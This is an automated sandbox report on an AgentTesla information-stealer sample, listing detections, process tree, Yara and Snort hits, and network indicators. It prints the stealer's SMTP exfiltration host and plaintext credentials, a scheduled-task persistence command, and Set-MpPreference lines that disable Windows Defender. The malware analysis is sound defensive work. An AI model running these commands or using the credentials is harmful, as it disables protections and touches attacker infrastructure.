Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Analysis ID:756116
MD5:fe1aa7fa995970ebb34465d5dc0d8ce1
SHA1:7505b261cc9df8c6ab8f10e035cf8d8319043cdb
SHA256:655b12a219d0f0e39a84fe44483e25411be852ce2bb0d451a1cb1a9a670f70b8
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • nrQtAokXKaSn.exe (PID: 5976 cmdline: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe MD5: FE1AA7FA995970EBB34465D5DC0D8CE1)
    • schtasks.exe (PID: 1372 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nrQtAokXKaSn.exe (PID: 2744 cmdline: {path} MD5: FE1AA7FA995970EBB34465D5DC0D8CE1)
    • nrQtAokXKaSn.exe (PID: 1008 cmdline: {path} MD5: FE1AA7FA995970EBB34465D5DC0D8CE1)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.strictfacilityservices.com", "Username": "accounts@strictfacilityservices.com", "Password": "SFS!@#321"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x31cca:$a13: get_DnsResolver
      • 0x303f4:$a20: get_LastAccessed
      • 0x326d7:$a27: set_InternalServerPort
      • 0x32a20:$a30: set_GuidMasterKey
      • 0x30506:$a33: get_Clipboard
      • 0x30514:$a34: get_Keyboard
      • 0x318b5:$a35: get_ShiftKeyDown
      • 0x318c6:$a36: get_AltKeyDown
      • 0x30521:$a37: get_Password
      • 0x31010:$a38: get_PasswordHash
      • 0x3210b:$a39: get_DefaultCredentials
      0000000B.00000002.532293061.0000000002CF4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000010.00000002.533369231.00000000028E4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 13 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x32bcc:$s10: logins
              • 0x3264c:$s11: credential
              • 0x2e906:$g1: get_Clipboard
              • 0x2e914:$g2: get_Keyboard
              • 0x2e921:$g3: get_Password
              • 0x2fca5:$g4: get_CtrlKeyDown
              • 0x2fcb5:$g5: get_ShiftKeyDown
              • 0x2fcc6:$g6: get_AltKeyDown
              0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x300ca:$a13: get_DnsResolver
              • 0x2e7f4:$a20: get_LastAccessed
              • 0x30ad7:$a27: set_InternalServerPort
              • 0x30e20:$a30: set_GuidMasterKey
              • 0x2e906:$a33: get_Clipboard
              • 0x2e914:$a34: get_Keyboard
              • 0x2fcb5:$a35: get_ShiftKeyDown
              • 0x2fcc6:$a36: get_AltKeyDown
              • 0x2e921:$a37: get_Password
              • 0x2f410:$a38: get_PasswordHash
              • 0x3050b:$a39: get_DefaultCredentials
              0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.2cfbae8.0.raw.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x29ecc:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
              • 0x29f10:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x29f58:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x2a1e4:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true
              • 0x2a248:$s2: Set-MpPreference -DisableArchiveScanning $true
              • 0x2a2a0:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
              • 0x2a2f8:$s4: Set-MpPreference -DisableScriptScanning $true
              • 0x2a344:$s5: Set-MpPreference -SubmitSamplesConsent 2
              • 0x2a384:$s6: Set-MpPreference -MAPSReporting 0
              • 0x2a3d0:$s7: Set-MpPreference -HighThreatDefaultAction 6
              • 0x2a428:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
              • 0x2a478:$s9: Set-MpPreference -LowThreatDefaultAction 6
              • 0x2a4c8:$s10: Set-MpPreference -SevereThreatDefaultAction 6
              Click to see the 13 entries

              Sigma Signatures

              Persistence and Installation Behavior

              barindex
              Sigma detected: Scheduled temp file as task from temp location
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, ParentProcessId: 4580, ParentProcessName: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp, ProcessId: 5756, ProcessName: schtasks.exe

              Snort Signatures

              Timestamp:192.168.2.6111.118.212.38497175872030171 11/29/22-16:51:24.449797
              SID:2030171
              Source Port:49717
              Destination Port:587
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.6111.118.212.38497225872030171 11/29/22-16:52:18.188399
              SID:2030171
              Source Port:49722
              Destination Port:587
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeReversingLabs: Detection: 31%
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeReversingLabs: Detection: 31%
              Machine Learning detection for sample
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeJoe Sandbox ML: detected
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.strictfacilityservices.com", "Username": "accounts@strictfacilityservices.com", "Password": "SFS!@#321"}
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: vaoPXhU.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, nrQtAokXKaSn.exe.0.dr

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49717 -> 111.118.212.38:587
              Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49722 -> 111.118.212.38:587
              May check the online IP address of the machine
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeDNS query: name: api.ipify.org
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewIP Address: 3.232.242.170 3.232.242.170
              Source: Joe Sandbox ViewIP Address: 3.232.242.170 3.232.242.170
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficTCP traffic: 192.168.2.6:49717 -> 111.118.212.38:587
              Source: global trafficTCP traffic: 192.168.2.6:49717 -> 111.118.212.38:587
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
              Source: nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://UrUbMY.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538758099.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539377168.0000000002B6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.strictfacilityservices.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538758099.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539377168.0000000002B6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://strictfacilityservices.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268958128.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268838022.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270013809.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270302429.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270410317.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270179920.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269843779.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269945334.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270233958.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com%(
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272447141.0000000005A47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271875759.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272325014.0000000005A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271875759.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comB.TTF
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comE.TTF
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsd
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comasF;-
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcomt
